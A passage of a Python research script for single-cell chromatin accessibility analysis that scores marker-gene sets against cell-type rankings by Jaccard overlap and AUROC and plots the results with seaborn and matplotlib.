df = df.pivot(index=None, columns='celltype')
print(df)
all_markers = AMARKER
kwargs = {'palette':col_dict, 'style':'marker', 'alpha':1, 'markers':dict([(all_markers[i], x) for i, x in enumerate(MSHAPES)]), \
'size':'marker', 'sizes':dict([(x, 100 if i == 0 else 40) for i, x in enumerate(all_markers)])}
df.columns = df.columns.droplevel()
print(df.columns)
print(df.reset_index())
plot_seaborn_scatter(df.reset_index(), '2_IN', '1_EX', 'marker', header+'_scat.pdf', kwargs, annot=False, scatter=True)
def plot_scatter_performance_gs(df, y, header):
global AMARKER, USHAPES
columns = df.loc[:,'celltype'].str.endswith('IN').values
if df.loc[(columns),:].shape[0] == 0:
columns = df.loc[:,'celltype'].str.endswith('NN').values
palette, shape = get_palette_shape(df.loc[(df.loc[:,'gene_size'] == 100) & (columns),:].shape[0])
df.index = df.marker
hue = df.columns[0]
df = df.loc[:,['gene_size', hue, y]]
col_dict = dict([(h, palette[i]) for i, h in enumerate(df.index[~df.index.duplicated()])])
dash_dict = dict([(h, (2, 2) if shape[i] == '--' else (1, 0)) for i, h in enumerate(df.index[~df.index.duplicated()])])
print(col_dict, dash_dict)
kwargs = {'palette':col_dict, 'edgecolor':'k'}
all_markers = AMARKER
kwargs = {'palette':col_dict, 'style':'marker', 'dashes':dash_dict, 'alpha':1, 'markers':dict([(all_markers[i], x) for i, x in enumerate(USHAPES)])}
# dict([(all_markers[i], x) for i, x in enumerate(['o', 'P', 's', '.', '^', '^', '^', '^'])])}
for celltype in pd.unique(df.loc[:,'celltype']):
tdf = df.loc[df.loc[:,'celltype'] == celltype,:]
tdf = tdf.iloc[::-1]
plot_seaborn_scatter(tdf.reset_index(), 'gene_size', y, 'marker', header+'_scat'+celltype+'.pdf', kwargs, annot=False, scatter=False, sort=False)
def read_and_concatenate(dir, roc_files):
all_results = None
for fname in roc_files:
df = pd.read_csv(os.path.join(dir, fname), header=0, index_col=0)
gse = fname.split('_')[0]
df = df.assign(gse=gse)
if all_results is None: all_results = df
else: all_results = pd.concat([all_results, df])
return all_results
def compare_prom_and_dist():
global ALL_DATA
dir = '/home/rkawaguc/ipythn/BICCN/script/Catactor/analysis/191219_meta/output/scobj'
roc_datasets = [['BICCN2_gene_id_order_gene__all_auroc.csv', 'BICCN2_distal_id_order_distal__all_auroc.csv', 'BICCN2_proximal_id_proximal__all_auroc.csv'], ['GSE111586_gene_id_order_gene__all_auroc.csv', 'GSE111586_distal_id_order_distal__all_auroc.csv', 'GSE111586_proximal_id_proximal__all_auroc.csv'],
['GSE123576_gene_id_order_gene__all_auroc.csv', 'GSE123576_distal_id_order_distal__all_auroc.csv', 'GSE123576_proximal_id_proximal__all_auroc.csv'],
['GSE126074_gene_id_order_gene__all_auroc.csv', 'GSE126074_distal_id_order_distal__all_auroc.csv', 'GSE126074_proximal_id_proximal__all_auroc.csv']]
if ALL_DATA:
roc_datasets.append(['GSE1303990_gene_id_order_gene__all_auroc.csv', 'GSE1303990_distal_id_order_distal__all_auroc.csv', 'GSE1303990_proximal_id_proximal__all_auroc.csv'])
peak_location = ['gene', 'distal', 'proximal']
for i in range(len(roc_datasets[0])):
all_results = read_and_concatenate(dir, [roc_datasets[l][i] for l in range(len(roc_datasets))])
all_results = all_results.assign(loc=peak_location[i])
for j in range(i+1, len(roc_datasets[0])):
comp_results = read_and_concatenate(dir, [roc_datasets[l][j] for l in range(len(roc_datasets))])
comp_results = comp_results.assign(loc=peak_location[j])
merged_results = all_results.merge(comp_results, how='inner', on=['marker', 'celltype', 'target', 'mode', 'gse', 'problem'])
for type in ['with_SC_', '']:
if type == '':
header_list = ['SF', 'CU', 'TA', 'TN', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303390']
temp = merged_results.loc[merged_results['marker'] != 'SC']
else:
header_list = ['SF', 'CU', 'TA', 'TN', 'SC', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303390']
temp = merged_results.copy()
# print(temp)
for cluster in ['celltype', 'cluster', 'neuron', 'inex']:
celltypes = (['P', 'N'] if cluster == 'neuron' else ['IN', 'EX'] if cluster == 'inex' else ['IN', 'EX', 'NN'])
for mode in ['average', 'rankmean']:
header = peak_location[i]+'_'+peak_location[j]+'_'+cluster+'_'+type+mode+'_'
print(temp.columns)
ttemp = temp.loc[(temp['problem'] == cluster) & (temp['mode'] == mode),:]
print(ttemp['marker'])
plot_auc_and_acc_scatter(ttemp, header_list, 'scatter_'+header, celltypes)
def plot_auc_and_acc_scatter(df, header_list, header, celltypes=['IN', 'EX', 'NN'], data=False):
palette, shape = get_palette_shape(len(header_list), data)
col_dict = dict([(h, palette[i]) for i, h in enumerate(header_list)])
exist_header = [x for x in header_list if df['marker'].str.contains(x).any()]
df['marker'] = pd.Categorical(df['marker'], exist_header)
# print(df.loc[df['marker'] == 'SF',:])
for celltype in celltypes:
tdf = df.loc[df['celltype'] == celltype,:]
cc, pvalue = spearmanr(tdf['auc_x'], tdf['auc_y'])
print(header+'_'+celltype+'_auc', cc, pvalue)
ax = sns.scatterplot(x='auc_x', y="auc_y", hue="marker", data=tdf, palette=col_dict)
ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
ax.set_title('Spearman CC='+str(cc)+', p='+str(pvalue), fontdict={'fontsize': 8, 'fontweight': 'medium'})
plt.savefig(header+'_'+celltype+'_auc.pdf', bbox_inches='tight')
plt.close('all')
plt.clf()
cc, pvalue = spearmanr(tdf['acc_x'], tdf['acc_y'])
print(header+'_'+celltype+'_acc', cc, pvalue)
ax = sns.scatterplot(x='acc_x', y="acc_y", hue="marker", data=tdf, palette=col_dict)
ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
ax.set_title('Spearman CC='+str(cc)+', p='+str(pvalue), fontdict={'fontsize': 8, 'fontweight': 'medium'})
plt.savefig(header+'_'+celltype+'_acc.pdf', bbox_inches='tight')
plt.close('all')
plt.clf()
def plot_auc_and_acc_boxplot(df, header_list, header, marker=None, data=False):
global AMARKER
if marker is None:
marker = AMARKER
palette, shape = get_palette_shape(len(marker), data=data)
print(header_list)
col_dict = dict([(h, palette[i]) for i, h in enumerate(header_list)])
exist_header = [x for x in header_list if df['marker'].str.contains(x).any()]
df['marker'] = pd.Categorical(df['marker'], exist_header)
ax = sns.boxplot(x='celltype', y="auc", hue="marker", data=df, palette=col_dict, showfliers=False)
ax = sns.swarmplot(x="celltype", y="auc", hue="marker", data=df, color=".2", dodge=True)
ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
plt.savefig(header+'_auc.pdf', bbox_inches='tight')
plt.close('all')
plt.clf()
ax = sns.boxplot(x='celltype', y="acc", hue="marker", data=df, palette=col_dict, showfliers=False)
ax = sns.swarmplot(x="celltype", y="acc", hue="marker", data=df, color=".2", dodge=True)
ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
plt.savefig(header+'_acc.pdf', bbox_inches='tight')
plt.close('all')
plt.clf()
def plot_auc_from_exp():
global AMARKER, PMARKER, SET, ALL_DATA
dir = '/home/rkawaguc/ipython/BICCN/script/Catactor/analysis/191219_meta/output/scobj'
tdir = '/home/rkawaguc/ipython/BICCN/script/Catactor/analysis/191219_meta/'
roc_files = ['BICCN2_gene_id_order_gene__all_auroc.csv', 'GSE111586_gene_id_order_gene__all_auroc.csv', 'GSE123576_gene_id_order_gene__all_auroc.csv', 'GSE126074_gene_id_order_gene__all_auroc.csv', 'GSE127257_distal_id_gene_order__all_auroc.csv']
if ALL_DATA:
roc_files.extend(['GSE1303990_gene_id_order_gene__all_auroc.csv'])
all_results = None
for fname in roc_files:
df = pd.read_csv(os.path.join(dir, fname), header=0, index_col=0)
gse = fname.split('_')[0]
df = df.assign(gse=gse)
if all_results is None: all_results = df
else: all_results = pd.concat([all_results, df])
for type in ['with_SC_', '', 'data_'][::-1]:
if type == '':
header_list = PMARKER[0:(SET-1)]
else:
if type == 'with_SC_':
header_list = AMARKER[0:SET]
else:
header_list = ['SF', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257']
if ALL_DATA:
header_list.append('GSE1303990')
print(all_results['marker'].unique())
temp = all_results.copy()
temp['marker'] = pd.Categorical(temp['marker'], header_list)
temp = temp.loc[[x == x for x in temp['marker']],:]
print(temp['marker'].unique())
collect_auc_exp_marker_set(temp, header_list, type, dir, tdir, roc_files)
def collect_auc_exp_marker_set(df, header_list, type, dir, tdir, roc_files):
smarkers = header_list
for cluster in ['celltype', 'cluster', 'neuron', 'inex']:
for mode in ['average', 'rankmean']:
header = cluster+'_'+type+mode+'_'
ttemp = df.loc[(df['problem'] == cluster) & (df['mode'] == mode),:]
ttemp = ttemp.loc[np.array([(row['marker'] != row['gse']) for i, row in ttemp.iterrows()]),:] # remove prediction by marker genes from the same dataset
plot_auc_and_acc_boxplot(ttemp, header_list, 'performance_'+header, data=(type == 'data_'))
print(ttemp['marker'].unique())
celltypes = (['P', 'N'] if cluster == 'neuron' else ['IN', 'EX'] if cluster == 'inex' else ['IN', 'EX', 'NN'])
for celltype in celltypes:
for gse in ttemp['gse'].unique():
gse_data = ttemp.loc[(ttemp['gse'] == gse) & (ttemp['celltype'] == celltype),:]
gse_data = gse_data.sort_values('marker')
tgse_data = gse_data.loc[[(x in smarkers) for x in gse_data['marker']],:]
print(tgse_data['marker'].unique())
print(tgse_data['marker'])
if type == 'data_':
tgse_data = tgse_data.loc[[(x != gse) for x in tgse_data['marker']],:]
# draw_auc_selected_each(tgse_data['roc_file'].tolist(), tgse_data['marker'].tolist(), 'roc_'+header+celltype+'_'+gse, dir=tdir, marker=smarkers, data=(type == 'data_'))
for rna in ['GSE126074', 'GSE1303990']:
if rna not in ttemp['gse'].unique():
continue
gse_data = pd.read_csv(os.path.join(dir, rna+'_rna_distal_global_index__all_auroc.csv'), header=0, index_col=0)
gse_data = gse_data.assign(gse=rna+'r')
print(rna, gse_data, os.path.join(dir, rna+'_rna_distal_global_index__all_auroc.csv'))
gse_data['marker'] = pd.Categorical(gse_data['marker'], header_list)
gse_data = gse_data.loc[(gse_data['problem'] == cluster) & (gse_data['mode'] == mode) & (gse_data['celltype'] == celltype),:]
gse_data = gse_data.sort_values('marker')
tgse_data = gse_data.loc[[(x in smarkers) for x in gse_data['marker']],:]
print(cluster, mode, celltype)
if tgse_data.shape[0] == 0:
exit()
# draw_auc_selected_each(tgse_data['roc_file'].tolist(), tgse_data['marker'].tolist(), 'roc_'+header+celltype+'_'+rna+'r', dir=tdir, marker=smarkers, data=(type == 'data_'))
print(tgse_data)
ttemp.to_csv(cluster+'_'+mode+'_'+celltype+'_extable.csv')
def summarize_auc_result():
global AMARKER, PMARKER
for type in ['', 'with_SC']:
if type == 'with_SC':
header_list = AMARKER
else:
header_list = PMARKER
# for cluster in ['celltype', 'cluster', 'icluster']:
for cluster in ['celltype', 'icluster']:
for problem in ['', '_neuron', '_inex']:
if 'cluster' not in cluster and problem != '':
continue
for gene_size in [100, 1000]:
fname = 'gene_'+cluster+problem+'_'+str(gene_size)+'_auroc.csv'
print(fname)
df = pd.read_csv(fname, index_col=0)
if type == '':
df = df.loc[~df.loc[:,'marker'].str.endswith('SC'),:]
df.loc[:,'marker'] = [x if '_' not in x else x.split('_')[-2] for x in df.loc[:,'marker'].values]
print(df['marker'])
cat_type = pd.CategoricalDtype(categories=header_list, ordered=True)
df.loc[:,'marker'] = df.astype(cat_type)
print(df['marker'])
df = df.sort_values(by='marker')
df.loc[:,'norm'] = df.loc[:,'norm'].fillna('')
print(df)
for norm in ['', '_normed']:
file_list = ['gene_'+cluster+'_'+h+'_'+str(gene_size)+problem+norm+'_fptpr.npy' for h in header_list]
draw_auc_selected(file_list, header_list, 'pred_result_'+cluster+problem+'_'+str(gene_size)+norm+type)
if problem == '':
plot_scatter_performance(df.loc[df.loc[:,'norm'] == norm,:], 'auc', 'pred_result_'+cluster+'_'+str(gene_size)+problem+norm+'_'+'auc'+type)
plot_scatter_performance(df.loc[df.loc[:,'norm'] == norm,:], 'accuracy', 'pred_result_'+cluster+'_'+str(gene_size)+problem+norm+'_'+'acc'+type)
all_df = None
for gene_size in GENE_SIZES:
fname = 'gene_'+cluster+problem+'_'+str(gene_size)+'_auroc.csv'
print(fname)
df = pd.read_csv(fname, index_col=0)
if type == '':
df = df.loc[~df.loc[:,'marker'].str.endswith('SC'),:]
df.loc[:,'marker'] = [x if '_' not in x else x.split('_')[-2] for x in df.loc[:,'marker'].values]
print(df['marker'])
cat_type = pd.CategoricalDtype(categories=header_list, ordered=True)
df.loc[:,'marker'] = df.astype(cat_type)
df.loc[:,'gene_size'] = gene_size
if all_df is None: all_df = df
else: all_df = pd.concat((all_df, df))
all_df = all_df.sort_values(by='marker')
all_df.loc[:,'norm'] = all_df.loc[:,'norm'].fillna('')
for norm in ['', '_normed']:
print(all_df)
plot_scatter_performance_gs(all_df.loc[all_df.loc[:,'norm'] == norm,:], 'auc', 'pred_result_'+cluster+'_all'+problem+norm+'_'+'auc'+type)
plot_scatter_performance_gs(all_df.loc[all_df.loc[:,'norm'] == norm,:], 'accuracy', 'pred_result_'+cluster+'_all'+problem+norm+'_'+'acc'+type)
def plot_heatmap_rank():
comp_jaccard_gene_list(['rank_gene_list_celltype.csv'], ['marker_name_list.csv'], 'gene_celltype', True)
# comp_jaccard_gene_list(['rank_gene_list_cluster.csv'], ['marker_name_list.csv'], 'gene_cluster', False)
comp_jaccard_gene_list(['rank_gene_list_icluster.csv'], ['marker_name_list.csv'], 'gene_icluster', False)
def plot_auc_result(fptpr, output, col_dict=None, shape=None):
import seaborn as sns
plt.figure(figsize=(6, 5))
lw = 2
if col_dict is None:
colors = sns.color_palette('Set2', 3)[::-1]
col_dict = dict([(c, colors[i]) for i, c in enumerate(['0_NN', '1_EX', '2_IN'])])
shape = ['-' for x in range(len(fptpr))]
for i, c in enumerate(fptpr):
plt.plot(fptpr[c][0], fptpr[c][1], shape[i]+'o', color=(col_dict[c] if c in col_dict else col_dict['0_NN']),
lw=lw, label=c)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic curve')
plt.legend(loc="lower right")
plt.savefig(output)
plt.close('all')
plt.clf()
def get_max_indices(Y_pred):
max_y = Y_pred.max(axis=0)
result = []
for i in range(Y_pred.shape[0]):
y_pred = [1 if Y_pred[i,j] == max_y[j] and Y_pred[i,j] > 0 and max(Y_pred[[h for h in range(Y_pred.shape[0]) if h != i] ,j]) < max_y[j] else 0 for j in range(Y_pred.shape[1])]
result.append(y_pred)
return np.array(result)
def comp_auroc(df, marker, header, annotated, sm_marker=None, problem=''):
result = []
marker = marker.iloc[0:1000,:]
Y_pred = np.array([[compute_jaccard(marker.loc[:,c], df.loc[:,j]) for j in df.columns] for c in marker.columns])
sm_pred = None
print(marker.iloc[:,0], df.iloc[:,0])
print(Y_pred.shape)
print('marker_order', marker.columns)
for norm in ['', '_normed']:
if len(norm) > 0: # norm for each signal type
Y_pred = norm_row_columns(Y_pred)
if problem == '':
col_ind, col_color = plot_cluster_against_marker_dist(marker.columns, df.columns, Y_pred, header, '_auc'+norm, annotated)
print(header+'_auc'+norm, col_ind)
Y_pred_bin = get_max_indices(Y_pred)
if annotated is None:
labels = convert_sample_to_label(['_'.join(x.split('_')[3:5]) for x in df.columns], annotated, problem)
else:
labels = convert_sample_to_label(df.columns, annotated, problem)
fptpr = {}
for i, c in enumerate(marker.columns):
if 'NA' in c:
continue
if problem == '_inex' and 'NN' in c:
continue
elif problem == '_neuron' and 'NN' not in c:
continue
print(c, 'vs', labels)
if problem in ['', '_inex']:
y_true = [1 if x else 0 for x in pd.Series(labels).str.contains((c.split('_')[1] if '_' in c else c))]
else:
y_true = [1 if '0_N' in x else 0 for x in labels]
if sum(y_true) == 0:
print('sum == 0')
print(header, problem)
print(labels)
print(y_true)
print('????')
# exit()
y_pred = Y_pred[i,:]
print(y_true, y_pred)
fpr, tpr, thresholds = metrics.roc_curve(y_true, y_pred, pos_label=1)
fptpr[c] = [fpr, tpr]
auc = metrics.auc(fpr, tpr)
y_pred = Y_pred_bin[i,:]
acc = metrics.accuracy_score(y_true, y_pred)
result.append([c, auc, acc, norm])
print(result)
if problem != '':
continue
if sm_marker is not None and 'NN' not in c:
selected = [ True if y_pred[j] == 1 else False for j in range(df.shape[1])]
selected_order = [j for j in col_ind if y_pred[j]]
selected_color = [col_color[h] for h, j in enumerate(col_ind) if y_pred[j]]
selected_marker = [sc for sc in sm_marker if c.split('_')[1] in sc]
sm_pred = np.array([[compute_jaccard(sm_marker.loc[:,sc], df.iloc[:,j]) for j in selected_order] for sc in selected_marker])
if norm != '':
sm_pred = norm_row_columns(sm_pred)
plot_cluster_against_marker_dist(selected_marker, df.iloc[:,selected_order].columns, sm_pred, header, '_sm_auc'+norm+'_'+c, annotated, [selected_color])
with open(header+problem+norm+'_fptpr.npy', 'wb') as f:
pickle.dump(fptpr, f)
if problem == '':
plot_auc_result(fptpr, header+norm+'_auc.pdf')
result_df = pd.DataFrame(result, columns=['celltype', 'auc', 'accuracy', 'norm'])
if result_df.shape[0] == 0:
return None
result_df.loc[:,'marker'] = header
return result_df
def evaluate_classification_acc_by_overlap(target_list, marker_list, header, ref_marker):
global GENE_SIZES
data = pd.read_csv(target_list, index_col=0)
marker = pd.read_csv(marker_list, index_col=0)
print(marker.columns)
ref_data = pd.read_csv(ref_marker, index_col=0)
print(ref_data.columns)
dict = (read_cluster_assignment(icluster=('icluster' in header)) if 'cluster' in header else None)
sample_types = convert_sample_to_label(data.columns, dict)
data = data.loc[:,[("NA" not in x) for x in sample_types]]
sample_types = [x for x in sample_types if "NA" not in x]
for problem in ['', '_inex', '_neuron']:
if 'cluster' not in header and problem != '':
continue
for gene_size in GENE_SIZES:
result = None
df = data.iloc[0:gene_size,:]
for m in ['SF', 'SC', 'CU', 'TA', 'TN']:
sm_marker = marker.loc[:,marker.columns.str.contains(pat='SM')]
print(header, m, str(gene_size))
theader = header+'_'+m+'_'+str(gene_size)
temp = marker.loc[:,marker.columns.str.contains(pat=m)]
temp.columns = ['_'.join(x.split('_')[1:]) for x in temp.columns]
temp.columns = get_celltype_category(temp.columns)
if gene_size in [100, 1000] and 'cluster' in header and problem == '':
tresult = comp_auroc(df.iloc[0:gene_size,:], temp.iloc[0:gene_size,:], theader, dict, sm_marker.iloc[0:gene_size,:], problem=problem)
else:
tresult = comp_auroc(df.iloc[0:gene_size,:], temp.iloc[0:gene_size,:], theader, dict, problem=problem)
tresult.loc[:,'marker'] = m
if result is None:
result = tresult
else:
result = pd.concat([result, tresult])
print('aaaaa')
print(gene_size)
for gse in set([x.split('_')[0] for x in ref_data.columns]):
print(gse)
theader = header+'_'+gse+'_'+str(gene_size)
temp = ref_data.loc[:,ref_data.columns.str.contains(pat=gse)].iloc[0:gene_size,:]
temp.columns = ['_'.join(x.split('_')[3:5]) for x in temp.columns]
print(temp.head())
print('oueaeu')
if len(temp.columns) > 4: # use only the dataset having 3 cell types
continue
print('???????????')
print(temp.columns)
temp = temp.loc[:,[c for c in temp.columns if 'NA' not in c]]
tresult = comp_auroc(df.loc[:,~df.columns.str.contains(gse)].iloc[0:gene_size,:], temp.iloc[0:gene_size,:], theader, dict, problem=problem)
result = pd.concat([result, tresult])
result.to_csv(header+problem+'_'+str(gene_size)+'_auroc.csv')
def rank_evaluation(rank_list=None, marker_list=None, header=None, ref_data_list=None):
if rank_list is None:
evaluate_classification_acc_by_overlap('rank_gene_list_celltype.csv', 'marker_name_list.csv', 'gene_celltype', 'rank_gene_list_celltype.csv')
# evaluate_classification_acc_by_overlap('rank_gene_list_cluster.csv', 'marker_name_list.csv', 'gene_cluster', 'rank_gene_list_celltype.csv')
evaluate_classification_acc_by_overlap('rank_gene_list_icluster.csv', 'marker_name_list.csv', 'gene_icluster', 'rank_gene_list_celltype.csv')
else:
return
evaluate_classfication_acc_by_overlap(rank_list, marker_list, header, ref_data_list)
# def plot_raw_signals_of_markers(mdirs, mfiles):
# for i, (mdir, mflist) in enumerate(zip(mdirs, mfiles)):
# if i == 3: break # Do not apply for detailed marker sets
# for j, mfile in enumerate(mflist):
# plot_specific_features("GSE123576_gene_id_order_gene__all_scanpy_obj.pyn", "GSE123576_gene", os.path.join(mdir, mfile))
# plot_specific_features("GSE111586_gene_id_order_gene__all_bin_scanpy_obj.pyn", "GSE111586_gene", os.path.join(mdir, mfile))
# plot_specific_features("GSE126074_gene_id_order_gene__all_scanpy_obj.pyn", "GSE126074_gene", os.path.join(mdir, mfile))
# plot_specific_features("GSE127257_distal_id_gene_order__all_scanpy_obj.pyn", "GSE127257_gene", os.path.join(mdir, mfile), marker=True)
# plot_specific_features("BICCN_gene_id_order_gene__all_bin_scanpy_obj.pyn", "BICCN_gene", os.path.join(mdir, mfile), marker=True)
def integrate_rank_data(mdirs, mfiles):
mname = ['SF', 'CU', 'TA', 'TN', 'SM']
nname = ['IN', 'EX', 'NN']
nname_detailed = ['EX_L2.3.IT', 'EX_L5.6.NP', 'EX_L5.ET', 'EX_L5.IT', 'EX_L6.CT', 'EX_L6.IT.Car3', 'EX_L6b', 'IN_Lamp5', 'IN_Pvalb', 'IN_Sncg', 'IN_Sst', 'IN_Vip']
marker_list = {}
for i, (mdir, mflist) in enumerate(zip(mdirs, mfiles)):
if mname[i] == 'SM':
marker_list[mname[i]] = pd.DataFrame(dict([(mname[i]+"_"+nname_detailed[j], read_markers(os.path.join(mdir, mfile))) for j, mfile in enumerate(mflist)]))
else:
marker_list[mname[i]] = pd.DataFrame(dict([(mname[i]+"_"+nname[j], read_markers(os.path.join(mdir, mfile))) for j, mfile in enumerate(mflist)]))
marker_list = reduce(lambda x, y: pd.concat([x, y], axis=1), [marker_list[x] for x in marker_list])
for c in [x for x in marker_list.columns if 'SF' in x]: # SF marker with the limit of genes same with CU
marker_list.loc[:,c.replace('SF', 'SC')] = marker_list.loc[~pd.isnull(marker_list.loc[:,c.replace('SF', 'CU')]),c]
print(marker_list)
marker_list.to_csv('marker_name_list.csv')
compare_rank_across_datasets(marker_list)
def plot_marker():
global GSES, SCANPY_OBJS
for gse, scanpy_obj in zip(GSES, SCANPY_OBJS['gene']):
output = gse+"_original_marker_gene.pdf"
print(scanpy_obj)
print(gse)
plot_specific_markers(os.path.join('output/scobj/', scanpy_obj), output)
def compute_marker_overlap():
# compute_marker_overlap_gene_list(['rank_gene_list_celltype.csv'], ['marker_name_list.csv'], 'gene_celltype', True)
compute_marker_overlap_gene_list(['rank_gene_list_icluster.csv'], ['marker_name_list.csv'], 'gene_icluster', False)
def heatmap(data, row_labels, col_labels, ax=None,
cbar_kw={}, cbarlabel="", **kwargs):
"""
Create a heatmap from a numpy array and two lists of labels.
Parameters
----------
data
A 2D numpy array of shape (N, M).
row_labels
A list or array of length N with the labels for the rows.
col_labels
A list or array of length M with the labels for the columns.
ax
A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If
not provided, use current axes or create a new one. Optional.
cbar_kw
A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.
cbarlabel
The label for the colorbar. Optional.
**kwargs
All other arguments are forwarded to `imshow`.
"""
if not ax:
ax = plt.gca()
# Plot the heatmap
im = ax.imshow(data, **kwargs)
# Create colorbar
cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)
cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom")
# We want to show all ticks...
ax.set_xticks(np.arange(data.shape[1]))
ax.set_yticks(np.arange(data.shape[0]))
# ... and label them with the respective list entries.
ax.set_xticklabels(col_labels)
ax.set_yticklabels(row_labels)
# Let the horizontal axes labeling appear on top.
ax.tick_params(top=True, bottom=False,
labeltop=True, labelbottom=False)
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=-30, ha="right",
rotation_mode="anchor")
# Turn spines off and create white grid.
for edge, spine in ax.spines.items():
spine.set_visible(False)
ax.set_xticks(np.arange(data.shape[1]+1)-.5, minor=True)
ax.set_yticks(np.arange(data.shape[0]+1)-.5, minor=True)
ax.grid(which="minor", color="w", linestyle='-', linewidth=3)
ax.tick_params(which="minor", bottom=False, left=False)
return im, cbar
def annotate_heatmap(im, data=None, valfmt="{x:.2f}",
textcolors=["black", "white"],
threshold=None, **textkw):
"""
A function to annotate a heatmap.
Parameters
----------
im
The AxesImage to be labeled.
data
Data used to annotate. If None, the image's data is used. Optional.
valfmt
The format of the annotations inside the heatmap. This should either
use the string format method, e.g. "$ {x:.2f}", or be a
`matplotlib.ticker.Formatter`. Optional.
textcolors
A list or array of two color specifications. The first is used for
values below a threshold, the second for those above. Optional.
threshold
Value in data units according to which the colors from textcolors are
applied. If None (the default) uses the middle of the colormap as
separation. Optional.
**kwargs
All other arguments are forwarded to each call to `text` used to create
the text labels.
"""
if not isinstance(data, (list, np.ndarray)):
data = im.get_array()
# Normalize the threshold to the images color range.
if threshold is not None:
threshold = im.norm(threshold)
else:
threshold = im.norm(data.max())/2.
# Set default alignment to center, but allow it to be
# overwritten by textkw.
kw = dict(horizontalalignment="center",
verticalalignment="center")
kw.update(textkw)
# Get the formatter in case a string is supplied
if isinstance(valfmt, str):
valfmt = matplotlib.ticker.StrMethodFormatter(valfmt)
# Loop over the data and create a `Text` for each "pixel".
# Change the text's color depending on the data.
texts = []
for i in range(data.shape[0]):
for j in range(data.shape[1]):
kw.update(color=textcolors[int(im.norm(data[i, j]) > threshold)])
text = im.axes.text(j, i, valfmt(data[i, j], None), **kw)
texts.append(text)
return texts
def plot_sim_map(dist, inter, header, row_labels, col_labels):
fig, ax = plt.subplots()
print(dist)
print(inter)
im, cbar = heatmap(dist, row_labels, col_labels, ax=ax,
cmap="magma_r", cbarlabel="Jaccard")
texts = annotate_heatmap(im, data=inter, valfmt="{x:d}")
fig.tight_layout()
plt.show()
plt.savefig(header+'_similarity.pdf')
plt.close('all')
plt.clf()
pd.DataFrame(dist, index=row_labels, columns=col_labels).to_csv(header+'_jaccard.csv')
pd.DataFrame(inter, index=row_labels, columns=col_labels).to_csv(header+'_inter.csv')
def compute_marker_overlap_gene_list(rank_file_list, marker_file_list, header, annotated=True):
global AMARKER, SET
if 'cluster' in header:
matplotlib.rcParams.update({'font.size': 5})
viridis = cm.get_cmap('viridis', 15)
all_markers = AMARKER[0:SET]+['SM']+AMARKER[(SET):len(AMARKER)]
def get_data(i, m):
print(i, m, SET)
if i < SET+1:
temp = marker.loc[:,marker.columns.str.contains(pat=m)]
colors = set_marker_color([x.split('_')[1] for x in temp.columns], 'Set2', ['NN', 'EX', 'IN'], others='NN')
else:
temp = data.loc[:,data.columns.str.contains(pat=m)]
sample_types = convert_sample_to_label(temp.columns, dict)
if '3_NA' in sample_types:
colors = set_marker_color(sample_types, 'Set2', ['3_NA', '0_NN', '1_EX', '2_IN'])
else:
colors = set_marker_color(sample_types, 'Set2', ['0_NN', '1_EX', '2_IN'])
print(temp.head())
temp = temp.reindex(sorted(temp.columns), axis=1)
return temp.iloc[0:100, :], colors
data = None
for fname in rank_file_list:
df = pd.read_csv(fname, index_col=0)
if data is None: data = df
else: data = pd.concat([data, df], axis=1)
marker = None
for fname in marker_file_list:
df = pd.read_csv(fname, index_col=0)
if marker is None: marker = df
else: marker = pd.concat([marker, df], axis=1)
if annotated:
dict = None
else:
dict = read_cluster_assignment(icluster=('icluster' in header))
flag_dendro = ('cluster' in header)
for i, m1 in enumerate(all_markers):
# break
left, row_colors = get_data(i, m1)
if left.shape[0] == 0:
continue
for j, m2 in enumerate(all_markers):
if j <= i: continue
print(m1, m2)
right, col_colors = get_data(j, m2)
if right.shape[0] == 0:
continue
dist = [[compute_jaccard(left.loc[~pd.isnull(left.loc[:,c]),c], right.loc[~pd.isnull(right.loc[:,j]),j]) for j in right.columns] for c in left.columns]
dist = pd.DataFrame(dist, columns=right.columns)
dist.index = left.columns
print(dist)
g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_cluster=flag_dendro, row_cluster=flag_dendro)
g.savefig("marker_overlaps_"+header+'_'+m1+'_'+m2+"_clustered.pdf")
if flag_dendro:
col_ind, row_ind = g.dendrogram_col.reordered_ind, g.dendrogram_row.reordered_ind
dist = dist.iloc[:, col_ind]
dist = dist.iloc[row_ind,:]
inter = [[compute_intersect(left.loc[~pd.isnull(left.loc[:,c]),c], right.loc[~pd.isnull(right.loc[:,j]),j]) for j in dist.columns] for c in dist.index]
plot_sim_map(dist.values, np.array(inter), header+'_'+m1+'_'+m2, dist.index, dist.columns)
data = data.loc[:, [x for x in sorted(data.columns) if 'NA' not in x]].iloc[0:100, :]
if flag_dendro:
sample_types = convert_sample_to_label(data.columns, dict)
print(sample_types)
print(data)
print(data.shape)
print(len(sample_types))
data = data.iloc[:, [i for i, s in enumerate(sample_types) if 'NA' not in s]]
sample_types = [s for s in sample_types if 'NA' not in s]
colors = set_marker_color(sample_types, 'Set2', ['0_NN', '1_EX', '2_IN'])
else:
colors = set_marker_color([x.split('_')[1] if len(x.split('_')) <= 3 else x.split('_')[-1] for x in data.columns], 'Set2', ['NN', 'EX', 'IN'], others='NN')
data = data.iloc[:, [i for i, c in enumerate(colors) if 'NA' not in c]]
colors = [c for c in colors]
colors = colors + set_marker_color([x.split('_')[1] for x in marker.columns], 'Set2', ['NN', 'EX', 'IN'], others='NN')
data = pd.concat([data, marker], axis=1)
